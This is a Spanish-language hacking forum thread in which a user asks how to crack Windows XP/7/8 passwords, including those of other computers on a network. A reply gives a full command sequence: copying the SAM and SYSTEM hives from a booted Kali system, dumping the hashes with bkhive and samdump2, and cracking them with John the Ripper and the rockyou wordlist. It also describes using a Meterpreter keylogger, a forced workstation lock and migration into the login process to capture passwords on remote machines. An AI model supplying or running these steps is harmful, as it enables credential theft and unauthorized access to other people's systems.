Descifrar contraseña de windows Xp, 7 y 8

Iniciado por elDanddy, Julio 08, 2015, 07:55:59 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 08, 2015, 07:55:59 PM Ultima modificación: Julio 08, 2015, 08:06:20 PM por Gabriela
Como descifró contraseña de sistemas operativo windows, no me interesa quitarla lo que me interesa es descubrir la contraseña también descifrar las contraseñas de computadoras windows que estén en red y inicien en red.

Nitro_x_net.

Gracias y saludos de antemano.

Enviado desde mi XT1032 mediante Tapatalk

elDanddy (Underc0de.org)

Julio 09, 2015, 12:17:22 AM #1 Ultima modificación: Julio 09, 2015, 12:24:37 AM por B3N
Si tienes acceso fisico a la maquina lo puedes hacer iniciando Kali en la misma. Aca te doy una forma sencilla:

1. Montas la particion del sistema:
Código: php
mount /dev/sda1 /mnt


2. Copias el SAM y el SYSTEM
Código: php
cp /mnt/Windows/System32/config/SAM /tmp
cp /mnt/Windows/System32/config/SYSTEM /tmp


3. Te pasas a /tmp para trabajar mas comodo
Código: php
cd /tmp


4. Generas las llaves del sistema y de booteo
Código: php
bkhive SYSTEM hive


5. Generas los hashes
Código: php
samdump2 SAM hive > hashes.txt


6. Descomprimes un diccionario:
Código: php
cp /usr/share/wordlists/rockyou.txt.gz /tmp
gunzip /tmp/rockyou.txt.gz


6. Descifras el password con el john
Código: php
john --format=nt -w=rockyou.txt hashes.txt


Otra opcion seria bajarte la tabla de Vista para Ophcrack y usar el mismo, aunque yo lo noto mucho mas lento que el john...ironicamente, porque se supone que el Ophcrack sea mas rapido porque no cifra cada password sino que compara los hashes directamente.
Para las maquinas en la red lo haces desde el meterpreter, si el password esta muy dificil de descifrar puedes iniciarle un keylogger desde el meterpreter, luego le bloqueas la session con rundll32 user32 LockWorkStation y migras hacia el proceso de login para capturar el password.
01010111 01100001 01101011 01100101 00100000 01110101
01110000 00100000 01001110 01100101 01101111

De forma más cómoda, puedes usar un live cd llamado OPHCrack el cual a través de tablas rainbows, intenta crackear la clave.

Saludos y suerte.